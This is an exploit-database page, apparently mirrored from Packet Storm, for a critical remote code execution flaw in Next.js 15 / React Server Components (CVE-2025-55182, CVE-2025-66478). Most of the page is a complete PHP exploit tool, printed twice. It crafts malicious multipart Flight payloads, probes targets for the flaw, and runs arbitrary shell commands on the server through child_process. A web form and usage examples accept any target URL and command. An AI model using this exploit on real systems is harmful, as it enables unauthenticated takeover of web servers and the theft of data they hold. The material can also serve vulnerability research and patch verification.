📄 Next.js 15 Remote Code Execution_PACKETSTORM:215162

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A PHP-based proof of concept implementation demonstrating the critical remote code execution vulnerability in React Server Components RSC Flight protocol, affecting React and Next.js applications...

Visit Original Source

Basic Information

ID PACKETSTORM:215162

Published Feb 9, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Next.js 15 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://nextjs.org/blog/next-15 |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212599/ & CVE-2025-55182, CVE-2025-66478

[+] Summary : A PHP-based proof-of-concept implementation demonstrating the critical Remote Code Execution vulnerability in React Server Components (RSC) Flight protocol, affecting React and Next.js applications

[+] POC : http://127.0.0.1/poc.php

<?php

class ReactRCEExploit {
private $targetUrl;
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';

public function __construct($targetUrl) {
$this->targetUrl = rtrim($targetUrl, '/');
}

/**
* بناء جزء Multipart خبيث
*/
private function buildMaliciousChunk($refIdx, $reason, $getToken, $nodePayload) {
$data = [
'then' => "\${$refIdx}:then",
'status' => 'resolved_model',
'reason' => $reason,
'value' => json_encode(['then' => '$B']),
'_response' => [
'_prefix' => $nodePayload,
'_formData' => [
'get' => "\${$refIdx}:{$getToken}:constructor"
]
]
];

return json_encode($data);
}

/**
* الحصول على قيمة عشوائية
*/
private function getRandomValue() {
$values = ['""', '{}', '[]', 'null', 'undefined', 'true', 'false'];
$randomString = bin2hex(random_bytes(8));
$values[] = "\"{$randomString}\"";

return $values[array_rand($values)];
}

/**
* بناء بيانات POST
*/
private function buildPostData($nodePayload) {
$randomReason = -rand(1, 9);
$randomRefIdx = rand(0, 9);
$getTokens = ['then', 'constructor'];
$randomGetToken = $getTokens[array_rand($getTokens)];

// بناء الجزء الخبيث
$chunk = $this->buildMaliciousChunk(
$randomRefIdx,
$randomReason,
$randomGetToken,
$nodePayload
);

// بناء بيانات multipart
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"0\"\r\n\r\n";
$data .= $chunk . "\r\n";

$cycleLength = rand($randomRefIdx, 9);
for ($i = 1; $i <= $cycleLength; $i++) {
$value = ($i == $randomRefIdx) ? "\"\$@{$randomRefIdx}\"" : $this->getRandomValue();
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"{$i}\"\r\n\r\n";
$data .= $value . "\r\n";
}

$data .= "--{$boundary}--\r\n";

return [
'data' => $data,
'boundary' => $boundary
];
}

/**
* إرسال الحمولة
*/
public function sendPayload($nodePayload) {
$postData = $this->buildPostData($nodePayload);

$headers = [
'Next-Action: ',
'Content-Type: multipart/form-data; boundary=' . $postData['boundary'],
'User-Agent: ' . $this->userAgent
];

$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers),
'content' => $postData['data'],
'ignore_errors' => true
]
]);

$response = @file_get_contents($this->targetUrl, false, $context);

if ($response === false) {
return [
'success' => false,
'error' => 'Failed to connect to target'
];
}

// استخراج معلومات الاستجابة
$httpResponse = $http_response_header;
$statusCode = $this->extractStatusCode($httpResponse);

return [
'success' => true,
'status' => $statusCode,
'headers' => $httpResponse,
'body' => $response
];
}

/**
* استخراج كود الحالة من الاستجابة
*/
private function extractStatusCode($headers) {
foreach ($headers as $header) {
if (preg_match('/HTTP\/\d\.\d\s+(\d+)/', $header, $matches)) {
return (int)$matches[1];
}
}
return 0;
}

/**
* التحقق من وجود الثغرة
*/
public function checkVulnerability() {
$randomId = bin2hex(random_bytes(8));
$nodePayload = "throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/{$randomId};307;`});";

$response = $this->sendPayload($nodePayload);

if (!$response['success']) {
return "Failed to connect to target";
}

if ($response['status'] == 303) {
$headersText = implode("\n", $response['headers']);
if (strpos($headersText, "/{$randomId};push") !== false) {
return "Vulnerable! The target appears to be exploitable.";
}
}

return "The target does not appear to be vulnerable.";
}

/**
* تنفيذ الأمر
*/
public function executeCommand($command) {
// تأمين الأمر (هذا مثال فقط، في الواقع يحتاج إلى مزيد من التحصين)
$escapedCommand = escapeshellcmd($command);
$nodePayload = "process.mainModule.require('child_process').exec(\"{$escapedCommand}\",{detached:true,stdio:'ignore'},function(){});";

return $this->sendPayload($nodePayload);
}
}

// مثال على الاستخدام
if (isset($_GET['test'])) {
header('Content-Type: text/plain; charset=utf-8');

$target = isset($_GET['target']) ? $_GET['target'] : 'http://localhost:3000';
$exploit = new ReactRCEExploit($target);

if (isset($_GET['cmd'])) {
// تنفيذ الأمر (لأغراض الاختبار فقط)
$result = $exploit->executeCommand($_GET['cmd']);
echo "Command Execution Result:\n";
print_r($result);
} else {
// التحقق من الثغرة
echo "Checking vulnerability...\n";
echo $exploit->checkVulnerability();
}

exit;
}
?>

<!DOCTYPE html>
<html>
<head>
<title>React RCE Test Tool</title>
<meta charset="utf-8">
</head>
<body>
<h1>React RCE Vulnerability Test</h1>
<p><strong>Warning:</strong> For authorized security testing only!</p>

<form method="GET">
<input type="hidden" name="test" value="1">

<label for="target">Target URL:</label><br>
<input type="text" id="target" name="target"
value="http://localhost:3000" size="50"><br><br>

<label for="cmd">Command to execute (optional):</label><br>
<input type="text" id="cmd" name="cmd"
placeholder="id" size="50"><br><br>

<input type="submit" value="Test Vulnerability">
</form>

<h2>Usage Examples:</h2>
<ul>
<li>Just check: <code>?test=1&target=http://example.com</code></li>
<li>Test with command: <code>?test=1&target=http://example.com&cmd=whoami</code></li>
</ul>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-09T16:17:39",
    "description": "A PHP-based proof of concept implementation demonstrating the critical remote code execution vulnerability in React Server Components RSC Flight protocol, affecting React and Next.js applications...",
    "published": "2026-02-09T00:00:00",
    "modified": "2026-02-09T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Next.js 15 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215162",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-55182",
        "CVE-2025-66478"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Next.js 15 RCE Exploit                                                                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://nextjs.org/blog/next-15                                                                                             |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212599/ &\tCVE-2025-55182, CVE-2025-66478\n    \n    [+] Summary    : A PHP-based proof-of-concept implementation demonstrating the critical Remote Code Execution vulnerability in React Server Components (RSC) Flight protocol, affecting React and Next.js applications\n    \n    [+] POC : http://127.0.0.1/poc.php\n    \n    <?php\n    \n    \n    class ReactRCEExploit {\n        private $targetUrl;\n        private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';\n        \n        public function __construct($targetUrl) {\n            $this->targetUrl = rtrim($targetUrl, '/');\n        }\n        \n        /**\n         * \u0628\u0646\u0627\u0621 \u062c\u0632\u0621 Multipart \u062e\u0628\u064a\u062b\n         */\n        private function buildMaliciousChunk($refIdx, $reason, $getToken, $nodePayload) {\n            $data = [\n                'then' => \"\\${$refIdx}:then\",\n                'status' => 'resolved_model',\n                'reason' => $reason,\n                'value' => json_encode(['then' => '$B']),\n                '_response' => [\n                    '_prefix' => $nodePayload,\n                    '_formData' => [\n                        'get' => \"\\${$refIdx}:{$getToken}:constructor\"\n                    ]\n                ]\n            ];\n            \n            return json_encode($data);\n        }\n        \n        /**\n         * \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0642\u064a\u0645\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629\n         */\n        private function getRandomValue() {\n            $values = ['\"\"', '{}', '[]', 'null', 'undefined', 'true', 'false'];\n            $randomString = bin2hex(random_bytes(8));\n            $values[] = \"\\\"{$randomString}\\\"\";\n            \n            return $values[array_rand($values)];\n        }\n        \n        /**\n         * \u0628\u0646\u0627\u0621 \u0628\u064a\u0627\u0646\u0627\u062a POST\n         */\n        private function buildPostData($nodePayload) {\n            $randomReason = -rand(1, 9);\n            $randomRefIdx = rand(0, 9);\n            $getTokens = ['then', 'constructor'];\n            $randomGetToken = $getTokens[array_rand($getTokens)];\n            \n            // \u0628\u0646\u0627\u0621 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062e\u0628\u064a\u062b\n            $chunk = $this->buildMaliciousChunk(\n                $randomRefIdx, \n                $randomReason, \n                $randomGetToken, \n                $nodePayload\n            );\n            \n            // \u0628\u0646\u0627\u0621 \u0628\u064a\u0627\u0646\u0627\u062a multipart\n            $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));\n            $data = \"--{$boundary}\\r\\n\";\n            $data .= \"Content-Disposition: form-data; name=\\\"0\\\"\\r\\n\\r\\n\";\n            $data .= $chunk . \"\\r\\n\";\n            \n            $cycleLength = rand($randomRefIdx, 9);\n            for ($i = 1; $i <= $cycleLength; $i++) {\n                $value = ($i == $randomRefIdx) ? \"\\\"\\$@{$randomRefIdx}\\\"\" : $this->getRandomValue();\n                $data .= \"--{$boundary}\\r\\n\";\n                $data .= \"Content-Disposition: form-data; name=\\\"{$i}\\\"\\r\\n\\r\\n\";\n                $data .= $value . \"\\r\\n\";\n            }\n            \n            $data .= \"--{$boundary}--\\r\\n\";\n            \n            return [\n                'data' => $data,\n                'boundary' => $boundary\n            ];\n        }\n        \n        /**\n         * \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\n         */\n        public function sendPayload($nodePayload) {\n            $postData = $this->buildPostData($nodePayload);\n            \n            $headers = [\n                'Next-Action: ',\n                'Content-Type: multipart/form-data; boundary=' . $postData['boundary'],\n                'User-Agent: ' . $this->userAgent\n            ];\n            \n            $context = stream_context_create([\n                'http' => [\n                    'method' => 'POST',\n                    'header' => implode(\"\\r\\n\", $headers),\n                    'content' => $postData['data'],\n                    'ignore_errors' => true\n                ]\n            ]);\n            \n            $response = @file_get_contents($this->targetUrl, false, $context);\n            \n            if ($response === false) {\n                return [\n                    'success' => false,\n                    'error' => 'Failed to connect to target'\n                ];\n            }\n            \n            // \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629\n            $httpResponse = $http_response_header;\n            $statusCode = $this->extractStatusCode($httpResponse);\n            \n            return [\n                'success' => true,\n                'status' => $statusCode,\n                'headers' => $httpResponse,\n                'body' => $response\n            ];\n        }\n        \n        /**\n         * \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0643\u0648\u062f \u0627\u0644\u062d\u0627\u0644\u0629 \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629\n         */\n        private function extractStatusCode($headers) {\n            foreach ($headers as $header) {\n                if (preg_match('/HTTP\\/\\d\\.\\d\\s+(\\d+)/', $header, $matches)) {\n                    return (int)$matches[1];\n                }\n            }\n            return 0;\n        }\n        \n        /**\n         * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\n         */\n        public function checkVulnerability() {\n            $randomId = bin2hex(random_bytes(8));\n            $nodePayload = \"throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/{$randomId};307;`});\";\n            \n            $response = $this->sendPayload($nodePayload);\n            \n            if (!$response['success']) {\n                return \"Failed to connect to target\";\n            }\n            \n            if ($response['status'] == 303) {\n                $headersText = implode(\"\\n\", $response['headers']);\n                if (strpos($headersText, \"/{$randomId};push\") !== false) {\n                    return \"Vulnerable! The target appears to be exploitable.\";\n                }\n            }\n            \n            return \"The target does not appear to be vulnerable.\";\n        }\n        \n        /**\n         * \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631\n         */\n        public function executeCommand($command) {\n            // \u062a\u0623\u0645\u064a\u0646 \u0627\u0644\u0623\u0645\u0631 (\u0647\u0630\u0627 \u0645\u062b\u0627\u0644 \u0641\u0642\u0637\u060c \u0641\u064a \u0627\u0644\u0648\u0627\u0642\u0639 \u064a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u062a\u062d\u0635\u064a\u0646)\n            $escapedCommand = escapeshellcmd($command);\n            $nodePayload = \"process.mainModule.require('child_process').exec(\\\"{$escapedCommand}\\\",{detached:true,stdio:'ignore'},function(){});\";\n            \n            return $this->sendPayload($nodePayload);\n        }\n    }\n    \n    // \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645\n    if (isset($_GET['test'])) {\n        header('Content-Type: text/plain; charset=utf-8');\n        \n        $target = isset($_GET['target']) ? $_GET['target'] : 'http://localhost:3000';\n        $exploit = new ReactRCEExploit($target);\n        \n        if (isset($_GET['cmd'])) {\n            // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631 (\u0644\u0623\u063a\u0631\u0627\u0636 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0641\u0642\u0637)\n            $result = $exploit->executeCommand($_GET['cmd']);\n            echo \"Command Execution Result:\\n\";\n            print_r($result);\n        } else {\n            // \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629\n            echo \"Checking vulnerability...\\n\";\n            echo $exploit->checkVulnerability();\n        }\n        \n        exit;\n    }\n    ?>\n    \n    <!DOCTYPE html>\n    <html>\n    <head>\n        <title>React RCE Test Tool</title>\n        <meta charset=\"utf-8\">\n    </head>\n    <body>\n        <h1>React RCE Vulnerability Test</h1>\n        <p><strong>Warning:</strong> For authorized security testing only!</p>\n        \n        <form method=\"GET\">\n            <input type=\"hidden\" name=\"test\" value=\"1\">\n            \n            <label for=\"target\">Target URL:</label><br>\n            <input type=\"text\" id=\"target\" name=\"target\" \n                   value=\"http://localhost:3000\" size=\"50\"><br><br>\n            \n            <label for=\"cmd\">Command to execute (optional):</label><br>\n            <input type=\"text\" id=\"cmd\" name=\"cmd\" \n                   placeholder=\"id\" size=\"50\"><br><br>\n            \n            <input type=\"submit\" value=\"Test Vulnerability\">\n        </form>\n        \n        <h2>Usage Examples:</h2>\n        <ul>\n            <li>Just check: <code>?test=1&target=http://example.com</code></li>\n            <li>Test with command: <code>?test=1&target=http://example.com&cmd=whoami</code></li>\n        </ul>\n    </body>\n    </html>\n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215162",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215162/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply